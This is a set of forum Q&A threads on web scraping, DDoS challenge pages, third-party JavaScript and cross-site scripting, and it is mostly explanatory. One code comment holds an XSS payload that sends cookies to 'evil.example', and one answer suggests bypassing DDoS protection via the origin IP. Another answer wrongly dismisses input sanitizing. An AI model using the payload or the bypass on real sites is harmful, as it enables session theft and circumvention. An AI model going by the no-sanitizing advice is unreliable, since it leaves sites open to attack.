I'm trying to scrape the data from the website using file_get_contents, but instead of the webpage source I'm getting the following code:
<body onload="challenge();">
<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1 6(){2.3=\'4=5; 0-7=8; 9=/\';a.b.c()}',13,13,'tax|function|document|cookie|ddosdefend|1d4607e3ac67b865e6c7263260c34e888cae7c56|challenge|age|0|path|window|location|reload'.split('|'),0,{}))
The engine is WordPress. Is there any chance to get the real source?
file_get_contents seems to work fine. However, you are not being served the desired content but some JavaScript code which needs to be evaluated before you are redirected to the content.
This might be because the website you want to scrape uses DDoS protection (e.g. something like CloudFlare) which detects your simple scraping attempt.
Usually, a DDoS protection service is a proxy between the original web server and your scraper. It inspects your request behavior, user agent, etc., and based on that either serves you the original web server's content or presents you with a challenge (e.g. a captcha, or simply requiring you to evaluate JavaScript).
If you can get the IP address of the original web server, you might be able to access it directly. The DNS resolution for the web server's name will direct you to the proxy, so you have to look elsewhere. Alternatively, use a web scraping library that emulates real browser behavior in PHP.
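If the protection only inspects request headers rather than requiring the JavaScript challenge to actually run, sending browser-like headers can already help; a minimal sketch (the URL is a placeholder):

    <?php
    // Sketch: send browser-like headers with file_get_contents. This only helps
    // if the protection merely inspects headers; a real JavaScript challenge
    // still requires a browser-emulating tool.
    $context = stream_context_create([
        'http' => [
            'header' => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n" .
                        "Accept: text/html\r\n",
        ],
    ]);

    $html = file_get_contents('http://www.example.com/', false, $context); // placeholder URL
    if ($html === false) {
        die('Request failed');
    }
    echo $html;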
I have a website builder which allows users to drag and drop HTML blocks (img, div, etc.) into the page. They can save it. Once they save it, they can view the page.
I also allow custom code like JavaScript. Would it be safe to have their page be displayed on another server on a subdomain (mypage.example.com) but still fetched from the same database as the main server, or does it not matter to put it on the same server as the main server?
As far as I know, they cannot execute any PHP code since I will be using echo to display the page content.
Thanks for the help!
That depends on your setup. If you allow them to run custom JavaScript, they can probably steal session tokens from other users, which could be used to take over other accounts. I would recommend reading about XSS (Cross-Site Scripting).
In short: XSS is the vulnerability of being able to inject code into a site, which will then run on other people's computers.
It wouldn't make sense to give you a strict tutorial on how to prevent this at this point, because every system is different and needs a different configuration to be attack-resistant.
Letting users put code somewhere is always a risk!
There is no need for another server, but you do need another domain to prevent Cross-Site Scripting attacks on your main page. And no, a subdomain may not be sufficient; put it on another domain altogether to be on the safe side. (Luckily, domains can be acquired for free if you're OK with a .tk domain.)
Would it be safe to have their page be displayed on another server on a subdomain
Even a subdomain could be dangerous; just put it on another domain altogether and you'll be safe.
or does it not matter to put it on the same server as the main server?
You can have it on the same server. By the way, did you know that with shared web hosting services (like GoDaddy, HostGator, etc.) there are thousands of websites sharing a single physical server?
Also, DO NOT listen to the people saying you need to sanitize or filter the HTML; that is NOT true. There is no need to filter out anything. In my opinion, that is corruption of data; don't do that to your users, there's no need to do it (at least none I can think of).
As far as I know, they cannot execute any PHP code since I will be using echo to display the page content.
Correct. If you were doing include("file"); or eval($code); then they could execute server-side code, but as long as you're just doing echo $code;, they won't be able to execute server-side code; that's not a security issue.
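To make the distinction concrete, here is a rough sketch (the user content and file name are made up):

    <?php
    // Hypothetical user content: the embedded PHP open/close tags are just
    // characters inside a string here, nothing more.
    $code = '<p>Hello</p> <?php unlink("config.php"); ?>';

    // Safe from server-side execution: the string is sent to the browser as-is
    // and PHP never interprets the tags embedded in it.
    echo $code;

    // These, by contrast, WOULD run user-controlled code on the server:
    // eval($code);              // executes the string as PHP
    // include 'user_page.php';  // executes the file as PHP if it contains PHP tags

    // Note: echo still delivers any <script> in $code to other visitors' browsers,
    // so client-side XSS remains a separate concern.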
We're talking to a 3rd party to include some of their data on a website of ours. They want to do it either through an iframe, which I don't prefer for responsiveness reasons.
The other option they offer is the inclusion of a JavaScript file which takes a parameter to know what DOM element to put the results in.
Basically this gives them access to the JavaScript scope of our website, in which, if they wanted, they could do things like hide DOM objects etc.
My question is: are there any security things I have to think of? Can they, in their JavaScript, for example, write malicious code that in the end reads .php files from our server and gets passwords from config files etc.? Or is the only thing they can do DOM-related?
They could:
- Take control of users' cookies, including reading and modifying them.
- Redirect the user to any site they would like.
- Embed any code they would like into the page.
They can't:
- Access PHP files directly.
- Access any server files directly.
JavaScript runs in the browser, not on the server.
You're essentially giving them trusted XSS privileges.
If you can do something in a web browser (make posts, "browse" a page, etc.), you can automate it using JavaScript. They won't be able to upload/modify your PHP files unless you (or your users) can.
To the user, you're giving them the capability to impersonate you.
To you, you're giving them the capability to impersonate users.
Can they, in their JavaScript, for example, write malicious code that in the end reads .php files from our server and gets passwords from config files etc.?
They can do anything in the JavaScript code you're including on your page for them that you can do in JavaScript code on that page. So that could be just about anything you can do client-side. It includes (for instance) grabbing session information that's exposed to your page and being able to send that information elsewhere.
If you don't trust them not to do that, don't include their JavaScript in your page.
We're talking to a 3rd party to include some of their data on a website of ours
Have them make that information available as data, not code, which you request via Ajax, and have them enable Cross-Origin Resource Sharing (CORS) for the URL in question for requests from your origin. Then you know you're just getting their data, not letting them run code.
Note that using JSONP instead of CORS would let them run code again, so it would have to be true Ajax with CORS if you don't trust them.
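On their end, enabling CORS for your origin is essentially one response header; a hypothetical sketch of such a data endpoint in PHP (the origin and payload are made up):

    <?php
    // Hypothetical data endpoint on the third party's server with CORS enabled.
    // Your page then requests it with plain XMLHttpRequest/fetch and inserts
    // the returned data itself, so none of their code runs on your origin.
    header('Access-Control-Allow-Origin: https://www.your-site.example'); // your origin only
    header('Content-Type: application/json');

    echo json_encode([
        'items' => [
            ['title' => 'Example item', 'value' => 42],
        ],
    ]);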
You shouldn't have to worry about PHP files or config files, but stealing session cookies or other XSS-style attacks could definitely be an issue.
Why can't/won't they provide data in the form of an API?
I want some content of my website to be dynamically loaded after login. A $.post(...) interacts with a servlet which validates the user's credentials, and then a $.load(url) loads the content from a separate page into a <div>. I noticed that, as long as I know where to fetch the content from, I can force this behavior from the Chrome JavaScript console, bypassing validation.
How can I prevent a user from doing this?
You can't.
Once a document has been delivered to the user's browser it is completely under the control of the user. They can run any JS they like.
The URLs you present on your webserver are the public interface to it. Anyone can request them. You can use authentication/authorization to limit who gets a response, but you can't make that response conditional on the user running specific JavaScript that you supply.
The server needs to authorize the user each time it delivers restricted data. You can't do it once and then trust the browser to enforce it.
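The question's backend is a servlet, but the same idea in PHP looks roughly like this (file and session key names are made up): the fragment that $.load() requests re-checks the session itself, so requesting the URL directly from the console returns nothing without a valid login.

    <?php
    // restricted_content.php - sketch: authorize on every delivery
    session_start();

    if (empty($_SESSION['user_id'])) {
        http_response_code(403);        // not logged in: refuse, no matter who asks
        exit('Not authorized');
    }

    echo '<div>Restricted content for user ' . htmlspecialchars((string) $_SESSION['user_id']) . '</div>';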
You can add a secret parameter to the URL you load: define a random value in the user's session (server side) or in the database, return it once validation is successful so your JavaScript code can use it in the next load call, and then check on the server side whether the secret parameter in the load URL has the correct value.
Hope it's clear.
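A rough sketch of that scheme in PHP (the original setup uses a servlet; file, parameter, and session key names are all made up):

    <?php
    // login.php - sketch: after the credentials check out, issue a random secret
    session_start();
    $_SESSION['content_token'] = bin2hex(random_bytes(16));
    echo json_encode(['token' => $_SESSION['content_token']]); // handed back to the $.post() callback

    // content.php - the URL passed to $.load('content.php?token=...') would then do:
    // session_start();
    // $token = $_GET['token'] ?? '';
    // if (!isset($_SESSION['content_token']) || !hash_equals($_SESSION['content_token'], $token)) {
    //     http_response_code(403);
    //     exit('Not authorized');
    // }
    // echo '<div>...restricted content...</div>';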
The simple answer is: You Can't.
JavaScript runs within the browser, and therefore a user or application can run their own code whenever they feel like it. This could be as simple as adding new CSS or running their own JS code.
The main thing you can do to mitigate this is to ensure all requests are validated on the server side before being acted on, and to accept only certain types of information (for example, allowing only integers where a number is expected, to stop arbitrary strings coming through).
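A small sketch of that kind of server-side validation (the id parameter is made up):

    <?php
    // Sketch: validate types on the server before using request data.
    // Only an integer id is accepted; arbitrary strings are rejected.
    $id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
    if ($id === false || $id === null) {
        http_response_code(400);
        exit('Invalid id');
    }
    // ... safe to treat $id as an integer from here on ...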
Something close to this sort of problem is XSS, or Cross-Site Scripting. A third party will try to inject some malicious code into a trusted website, usually through some form of POST, to affect different users. Here is some more information on the matter:
Cross-Site Scripting - Wikipedia
XSS - OWASP
I'm looking for a method to scrape a website (which uses JavaScript) from the server side and save the output, after analyzing the data, into a MySQL database. I need to navigate from page to page by clicking links and submitting data from the database, without the session expiring. Is this possible using the phpQuery web browser plugin? I've started doing this using CasperJS. I would like to know the pros and cons of both methods. I'm a beginner in the coding space. Please help.
I would recommend that you use PhantomJS or CasperJS and parse the DOM with JavaScript selectors to get the parts of the pages you want back. Don't use phpQuery as it's based on PHP and would require a separate step in your processing versus using just JavaScript DOM parsing. Also, you won't be able to perform click events using PHP. Anything client side would need to be run in PhantomJS or CasperJS.
It might even be possible to write a full scraping engine using just PHP if that's your server-side language of choice. You would need to reverse engineer the login process and maintain a cookie jar with your cURL requests to keep your login valid with each request. Once you've established a session with the website, you can then set up your navigation path with an array of links that you would like to crawl. The idea behind web crawling is that you load a page from some link, process the page, and then move to the next link. You continue this process until all pages have been processed, and then your crawl is complete.
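A very rough sketch of that cURL approach (the URLs, form field names, and parsing step are placeholders):

    <?php
    // Sketch: log in once, keep cookies in a jar, then walk a list of links.
    $cookieJar = tempnam(sys_get_temp_dir(), 'cookies');

    function fetch(string $url, string $cookieJar, ?array $post = null): string {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieJar);   // write cookies here
        curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieJar);  // and send them back
        if ($post !== null) {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post));
        }
        $body = curl_exec($ch);
        curl_close($ch);
        return $body === false ? '' : $body;
    }

    // 1. Log in (reverse engineer the real form field names first).
    fetch('http://www.example.com/login', $cookieJar, ['user' => 'me', 'pass' => 'secret']);

    // 2. Crawl the pages you care about with the same cookie jar.
    $links = ['http://www.example.com/page1', 'http://www.example.com/page2'];
    foreach ($links as $link) {
        $html = fetch($link, $cookieJar);
        // ... parse $html (e.g. with DOMDocument) and store the results in MySQL ...
    }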
I would check out Google's guide Making AJAX Applications Crawlable; the website you're trying to scrape might have adopted the scheme (making their site's content crawlable).
You want to look for #! in the URL's hash fragment; this indicates to the crawler that the site supports the AJAX crawling scheme.
To put it simply, when you come across a URL like www.example.com/ajax.html#!key=value, you would modify it to www.example.com/ajax.html?_escaped_fragment_=key=value. The server should respond with an HTML snapshot of that page.
Here is the Full Specification
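A small helper sketching that URL transformation (simplified; the full specification also requires percent-encoding certain characters in the fragment value):

    <?php
    // Sketch: turn an AJAX-crawling URL (#!) into its _escaped_fragment_ form
    // so the server returns an HTML snapshot instead of the JavaScript shell.
    function escapedFragmentUrl(string $url): string {
        $pos = strpos($url, '#!');
        if ($pos === false) {
            return $url;                                   // site doesn't use the scheme
        }
        $base     = substr($url, 0, $pos);
        $fragment = substr($url, $pos + 2);
        $sep      = strpos($base, '?') === false ? '?' : '&';
        return $base . $sep . '_escaped_fragment_=' . $fragment;
    }

    echo escapedFragmentUrl('http://www.example.com/ajax.html#!key=value');
    // http://www.example.com/ajax.html?_escaped_fragment_=key=value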
I understand there are lots of questions concerning Cross-Site Scripting on SO and I have tried to read the most-voted ones. Having read some web pages too, I'm still unsure about all the possibilities that this attack type can use. I'm not asking how to sanitize input, but rather what one can expect.
In most examples given on SO and other pages there are two methods, where the simplest (e.g. this one on PHPMaster) seems to be inserting some <script> code used for stealing cookies etc.
The other, presented here by user Baba, is to insert a full <form> code structure; however, it seems it should not work until the user submits the form, though some JavaScript event like ... onmouseover='form.submit()' ... might be used.
All the network examples I've been able to check are based only on using some JavaScript code.
Is it possible to use other methods, say, somehow changing the HTML, or even the server-side script?
I know one can obtain this by SQL injection or just hacking the server, but I mean only by manipulating (wrongly handled) GET or POST requests, or perhaps something else?
Cross-Site Scripting is not just about inserting JavaScript code into a web page. It is rather a general term for any injection of code that gets interpreted by the browser in the context of the vulnerable web page, see CWE-79:
During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.
An attacker could, for example, inject his own login form into an existing login page that redirects the credentials to his site. This would also be called XSS.
However, it is often easier and more promising to inject JavaScript, as it can both control the document and the victim's browser. With JavaScript an attacker can read cookies and thus steal a victim's session cookie to hijack the victim's session. In certain cases, an attacker would even be able to execute arbitrary commands on the victim's machine.
The attack vectors for XSS are diverse, but they all have in common that they are possible due to some improperly handled input. This can be parameters provided via GET or POST, but also any other information contained in the HTTP request, e.g. cookies or any other HTTP header fields. Some use a single injection point, others are split up over multiple injection points; some are direct, some are indirect; some are triggered automatically, some require certain events; etc.
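The classic reflected case looks roughly like this (the file and parameter names are made up):

    <?php
    // search.php - sketch of a reflected XSS hole: a GET parameter is echoed
    // into the page unescaped, so a crafted link such as
    //   search.php?q=<script>document.location='http://evil.example/?c='+document.cookie</script>
    // runs the attacker's script in the victim's browser.
    $q = $_GET['q'] ?? '';

    echo '<p>Results for: ' . $q . '</p>';                                        // vulnerable
    echo '<p>Results for: ' . htmlspecialchars($q, ENT_QUOTES, 'UTF-8') . '</p>'; // escaped output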
I know one can obtain this by SQL injection or just hacking the server, but I mean only by manipulating (wrongly handled) GET or POST requests, or perhaps something else?
GET parameters and POST bodies are the primary vector for attacking a web application via HTTP requests, but there are others. If you aren't careful about file uploads, then I might be able to upload a Trojan. If you naively host uploaded files in the same domain as your website, then I can upload JS or HTML and have it run with same-origin privileges. Request headers are also inputs that an attacker might manipulate, but I don't know of successful attacks that abuse them.
Code-injection is a class of attacks that includes XSS, SQL Injection, Shell injection, etc.
Any time a GET or POST parameter that is controlled by an attacker is turned into code or a programming language symbol, you risk a code-injection vulnerability.
If a GET or POST parameter is naively interpolated into a string of SQL, then you risk SQL injection.
If a GET or POST parameter (or header like the filename in a file upload) is passed to a shell, then you risk shell injection and file inclusion.
If your application uses your server-side language's equivalent of eval with an untrusted parameter, then you risk server-side script injection.
You need to be suspicious of all your inputs, treat them as plain text strings, and when composing a string in another language, convert the plain text string into a substring in that target language by escaping. Filtering can provide defense in depth here.
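A sketch of that "escape for the target language" idea in PHP (the database credentials are placeholders):

    <?php
    // The same untrusted string is treated differently depending on where it ends up.
    $input = $_GET['name'] ?? '';

    // Into HTML: escape markup metacharacters.
    echo htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

    // Into SQL: don't build query strings at all, bind parameters instead (PDO shown).
    $pdo  = new PDO('mysql:host=localhost;dbname=test', 'user', 'pass'); // placeholder credentials
    $stmt = $pdo->prepare('SELECT id FROM users WHERE name = ?');
    $stmt->execute([$input]);

    // Into a shell command: quote the argument.
    $out = shell_exec('ls ' . escapeshellarg($input));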
XSS - is it only possible by using JavaScript?
No. VBScript can be injected in IE. JavaScript can be injected indirectly via URLs and via CSS. Injected images can leak secrets hidden in the referrer URL. Injected meta tags or iframes can redirect to a phishing version of your site.
Systems that are vulnerable to HTTP response header splitting can be subverted by HTML & scripts injected into response headers like redirect URLs or Set-Cookie directives.
HTML embeds so many languages that you need to be very careful about including snippets of HTML from untrusted sources. Use a white-listing sanitizer if you must include foreign HTML in your site.
XSS is about JavaScript.
However, to inject your malicious JavaScript code you have to exploit a vulnerability in the page's code, which might be on the server or client side.
You can use CSP (Content Security Policy) to prevent XSS in modern browsers.
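For example, a minimal policy can be sent as a response header (a sketch; the exact policy depends on what your pages legitimately need to load):

    <?php
    // Only allow scripts from our own origin; CSP-aware browsers will then
    // refuse injected inline <script> blocks and scripts from other hosts.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");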
There is also a list of XSS tricks in the XSS Cheat Sheet. However, most of those tricks won't work in modern browsers.
Webkit won't execute javascript if it is also part of the request.
For example, demo.php?x=<script>alert("xss")</script> won't display an alert box even if the script tag gets injected into the DOM. Instead, the following error is thrown:
"Refused to execute a JavaScript script. Source code of script found within request."